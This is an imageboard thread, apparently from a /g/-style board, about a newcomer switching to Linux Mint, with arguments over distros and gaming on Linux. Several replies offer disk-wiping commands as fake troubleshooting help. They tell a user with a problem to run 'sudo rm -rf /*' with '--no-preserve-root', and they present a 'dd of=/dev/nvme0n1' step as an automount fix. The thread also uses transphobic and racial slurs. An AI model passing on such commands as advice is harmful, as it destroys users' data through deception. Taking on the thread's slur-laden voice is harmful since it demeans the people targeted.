I call this the "granny stack". You can give it to your boomer relatives and it will be at least a year before they need help again.
>bro just make your text editor your browser and video editor as well
why is that bad? what's next, you make your file manager and video editor on the same gui toolkit?
>There’s an old prank online that instructs newbies to type sudo rm -R /. (Don’t do this.) The command recursively deletes every file on your system, and your OS will happily do it without further prompting. As the lecture file says, when using sudo, “think before you type.”
nice try
I tried this but it only deleted my user and nothing else. I must be the dumbest guy on IQfy to frick up uninstalling my entire computer every single time its suggested
that's easy, some drive didn't get mounted. On debian I'd fix it with:
1. type 'sudo parted' in terminal, you should see something like 'Using /dev/nvme0n1' which is your main ssd drive (it will be something like /dev/sda1 for hdd) and exit with CTRL+C
2. write 'sudo echo automount | dd of=/dev/nvme0n1' to add automount option to all partitions on this drive
>It's literally 20 mins of clicking [next] during installation and watching progressbar but you're excited as if you lost your virginity.
I remember the first time I booted into a Linux distro. It was good times. Let OP be happy/
Distro of a distro of a distro. Never good, too many packaging problems.
But who are we kidding, wintards don't care about that, they probably won't even use a package manager. They will just use steam and switch back when they buy a game that doesn't work or the have driver issues, want an "account" for their webapp, want a 2GB program for 1 specific task, and don't want to write a script etc.
There's nothing wrong with mint. Linux has always been made up of a ton of random things being thrown together; a derivative of a derivative is perfectly fine. It's pushed itself into being one of the most popular distros for a reason. It's easy and just works.
At least with Mint you'll be shielded from the mess that is X11-to-Wayland for awhile. Though you'll likely come back to Windows when you need to actually get work done, because Wine doesn't cut it for anything beyond gaming. And even with gaming, good luck getting Arma 3 mods to work, or modding without steam and literal-who github scripts.
No I just wonder
1) why aren't you banned
2) how come I get banned for replying / quoting you
Do Black person jannies really permaban and filter for spelling J with 3 letters but not for 4? Despite you only using 4 letters for the past year? Do IQfy janitors not know about regular expressions? a+ there jannies saved you hours of work you are welcome
>unhinged feminine emotional tirade with zero technical critiques >constantly calling other people troons then having a mental breakdown when the tables have turned
Not an argument.
now learn Emacs
what compels an npc to install these irrelevant Black person distros?
what compels an NPC to use emacs over vim?

good but replace mint with ubuntu and remove thunderbird and troonyfox
I'm going for ease of use, not what's "best". The whole point is that it can be used by someone whose mind is still stuck in Windows 95.
i know
What would you install that's easier to use then?
now are IQfy posters grannies and boomers or what? fricking use something doesn't look like it was designed in the last century
otherwise known as the 'it just werks stack'

Problem officer?
Mint is good becuase it looks like windows and it just works
Zorin does the job of looking like windows and just working out of the box better, and both of them are just Ubuntu re-skinned
Enjoy debugging simulator

I give you 1 week before you have an urge to switch back to windows
shit is already going wrong anyone know why this is happening ?
Go to terminal and run
sudo rm -rf /*

where did you install your computer? in your butthole?
you forgot --no-preserve-root

Without any context it's impossible to tell. You might be trying to access a network location or something like that.
It's literally 20 mins of clicking [next] during installation and watching progressbar but you're excited as if you lost your virginity.
I think you should think your life over, OP.
Most people are incapable of doing that, surprisingly.
shut up windowsgay
>as if you lost your virginity
akschually it's GNU/Virginity
>It's literally 20 mins of clicking [next] during installation and watching progressbar but you're excited as if you lost your virginity.
I remember the first time I booted into a Linux distro. It was good times. Let OP be happy/
OP, you're fricking stupid. You didn't install Arch. Arch IS Linux and basically any other distribution is hacky bloatware.
Gotta start somewhere
>he actually fell for the mint meme
LMAO
what's wrong with mint?
elaborate now
Distro of a distro of a distro. Never good, too many packaging problems.
But who are we kidding, wintards don't care about that, they probably won't even use a package manager. They will just use steam and switch back when they buy a game that doesn't work or the have driver issues, want an "account" for their webapp, want a 2GB program for 1 specific task, and don't want to write a script etc.
so what distro requires low effort then?
There's nothing wrong with mint. Linux has always been made up of a ton of random things being thrown together; a derivative of a derivative is perfectly fine. It's pushed itself into being one of the most popular distros for a reason. It's easy and just works.
doing the same right now. this shit is easy as frick

>No NO NO YOU HAVE TO KNOW HOW EVERY INCH OF YOUR SYSTEM WORKS
Some people have lives. Ubuntu/Mint just werk.
>Ubuntu/Mint just werk.
ofc, go ahead install snaps until your system breaks and you go back to win dies
At least with Mint you'll be shielded from the mess that is X11-to-Wayland for awhile. Though you'll likely come back to Windows when you need to actually get work done, because Wine doesn't cut it for anything beyond gaming. And even with gaming, good luck getting Arma 3 mods to work, or modding without steam and literal-who github scripts.
idk pirated & modded arma 3 worked fine for me, you can even use overlayfs as a game-agnostic mod manager.
>good luck getting Arma 3 mods to work
Just use the arma3unix launcher
t. played heavily modded ARMA3 multiplayer on loonix
Have fun and learn alot bro!
No I just wonder

You'll go back in 10 days.
Excellent, enjoy your time at penguin land.
Welcome to the lgbt club. I see you are using linux mint. This is good choice to be different like every other lgbt member
Your troony obsession does not change the fact that Mint is beyond dogshit even for loonix standards.
>unhinged feminine emotional tirade with zero technical critiques

HE FELL FOR THE MEME
Welcome to the world of the unemployed
Installing Linux mint by yourself already probably puts you in the top 1% of the population in terms of tech skills unironically.

Don't listen to arch troons and enjoy. Mint is good.
